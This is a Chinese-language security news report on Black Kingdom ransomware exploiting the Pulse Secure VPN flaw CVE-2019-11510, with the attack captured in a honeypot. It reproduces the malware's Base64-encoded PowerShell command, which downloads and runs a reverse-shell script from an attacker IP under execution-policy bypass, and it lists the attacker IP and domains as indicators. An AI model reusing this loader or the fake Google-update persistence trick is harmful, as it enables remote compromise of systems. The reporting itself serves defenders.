Black Kingdom勒索软件利用Pulse VPN漏洞入侵网络

安全研究人员发现，Black Kingdom勒索软件的运营商将目标瞄准具有未修补的Pulse Secure VPN软件或网络初始访问权限的企业。

该恶意软件被捕获在一个蜜罐中，使研究人员可以分析和记录威胁行为者使用的策略。

操作方式

他们正在利用CVE-2019-11510，这是一个影响早于2019年4月修补的Pulse Secure VPN早期版本的严重漏洞。即使漏洞利用公开后，公司也延迟了其软件更新，促使美国政府发出了多次警报，威胁者也开始利用它 ; 一些组织继续运行该产品的漏洞版本。

一家位于波兰的提供网络安全服务的公司REDTEAM.PL观察到，Black Kingdom运营商使用Pulse Secure VPN提供的同一门口违反了他们认为的目标。

从研究人员的观察来看，勒索软件通过模拟合法的Google Chrome计划任务来建立持久性，并用一个字母来表示区别：

GoogleUpdateTaskMachineUSA - Black Kingdom task
GoogleUpdateTaskMachineUA - legitimate Google Chrome task

根据REDTEAM.PL的分析，计划任务在隐藏的PowerShell窗口中运行Base64编码的字符串代码，以获取名为“ reverse.ps1”的脚本，该脚本很可能用于在受感染主机上打开反向Shell。

cversions_cache.ps1 script:

$update = "SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQA4AC4AMQAzAC4ANAA5AC4AMQA3ADkALwByAGUAdgBlAHIAcwBlAC4AcABzADEAJwApAA=="

powershell.exe -exec bypass -nologo -Enc $update

REDTEAM.PL 的Adam Ziaja告诉BleepingComputer，无法从攻击者控制的远程服务器中检索脚本，这可能是因为承载该脚本的服务器在交付有效负载之前已被阻塞。

“ reverse.ps1”所在的IP地址是198.13.49.179，由Vultr的子公司Choopa管理，该公司以其提供的廉价虚拟专用服务器（VPS）闻名，并被网络罪犯用来托管其恶意软件。工具。

它解析为三个域，第三个域连接到托管Android和加密货币挖掘恶意软件的美国和意大利的其他服务器。

host.cutestboty.com
keepass.cutestboty.com
anno1119.com

操作方式

最近出现